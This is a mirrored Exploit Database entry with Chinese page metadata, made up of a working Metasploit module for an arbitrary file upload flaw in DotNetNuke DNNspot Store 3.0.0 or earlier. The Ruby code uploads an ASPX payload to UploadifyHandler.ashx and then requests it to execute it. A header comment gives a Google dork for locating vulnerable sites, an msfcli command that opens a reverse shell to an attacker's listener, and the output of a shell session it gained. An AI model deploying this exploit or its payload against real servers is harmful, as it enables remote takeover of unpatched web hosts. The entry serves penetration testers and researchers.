DotNetNuke DNNspot Store 3.0.0 – Arbitrary File Upload (Metasploit)

• Exploit Database
• 7 阅读

• 作者： Glafkos Charalambous
  日期： 2014-10-22
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35039/

• # Exploit Title: DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload
  # Date: 23/01/2014
  # Author: Glafkos Charalambous
  # Version: 3.0.0
  # Vendor: DNNspot
  # Vendor URL: https://www.dnnspot.com
  # Google Dork: inurl:/DesktopModules/DNNspot-Store/
  #
  # root@kali:~# msfcli exploit/windows/http/dnnspot_upload_exec payload=windows/shell/reverse_tcp LHOST=192.168.13.37 LPORT=31337 RHOST=192.168.31.33 RPORT=80 E
  # [*] Initializing modules...
  # payload => windows/shell/reverse_tcp
  # LHOST => 192.168.13.37
  # LPORT => 31337
  # RHOST => 192.168.31.33
  # [-] Handler failed to bind to 192.168.13.37:31337
  # [*] Started reverse handler on 0.0.0.0:31337 
  # [*] 192.168.31.33:80 - Uploading payload...
  # [*] 192.168.31.33:80 - Executing payload trrnegmv.aspx
  # [*] Encoded stage with x86/shikata_ga_nai
  # [*] Sending encoded stage (267 bytes) to 192.168.31.33
  # [*] Command shell session 1 opened (192.168.13.37:31337 -> 192.168.31.33:56806) at 2014-08-28 20:56:23 +0300
  # [+] Deleted trrnegmv.aspx
  # 
  # Microsoft Windows [Version 6.2.9200]
  # (c) 2012 Microsoft Corporation. All rights reserved.
  # 
  # C:\Windows\SysWOW64\inetsrv>
  #
  
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload',
  'Description'=> %q{
  This module exploits an arbitrary file upload vulnerability found in DotNetNuke DNNspot Store
  		module versions below 3.0.0.
  },
  'Author' =>
  [
  'Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>'
  ],
  'License'=> MSF_LICENSE,
  'References' =>
  [
  [ 'URL', 'http://metasploit.com' ]
  ],
  'Platform' => 'win',
  'Arch' => ARCH_X86,
  'Privileged' => false,
  'Targets'=>
  [
  [ 'DNNspot-Store / Windows', {} ],
  ],
  'DefaultTarget'=> 0,
  'DisclosureDate' => 'Jul 21 2014'))
  end
  
  def check
  res = send_request_cgi({
  'method' => 'GET',
  'uri'=> normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx")
  })
  
  if res and res.code == 200
  return Exploit::CheckCode::Detected
  else
  return Exploit::CheckCode::Safe
  end
  end
  
  def exploit
  @payload_name = "#{rand_text_alpha_lower(8)}.aspx"
  exe= generate_payload_exe
  aspx= Msf::Util::EXE.to_exe_aspx(exe)
  post_data = Rex::MIME::Message.new
  post_data.add_part(aspx, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
  post_data.add_part("/DesktopModules/DNNspot-Store/ProductPhotos/", nil, nil, "form-data; name=\"folder\"")
  post_data.add_part("1", nil, nil, "form-data; name=\"productId\"")
  post_data.add_part("w00t", nil, nil, "form-data; name=\"type\"")
  data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
  
  print_status("#{peer} - Uploading payload...")
  res = send_request_cgi({
  "method" => "POST",
  "uri"=> normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx"),
  "data" => data,
  "ctype"=> "multipart/form-data; boundary=#{post_data.bound}"
  })
  
  unless res and res.code == 200
  fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
  end
  
  register_files_for_cleanup(@payload_name)
  
  print_status("#{peer} - Executing payload #{@payload_name}")
  res = send_request_cgi({
  	'method' => 'GET',
  'uri'=> normalize_uri("/DesktopModules/DNNspot-Store/ProductPhotos/",@payload_name)
  })
  end
  end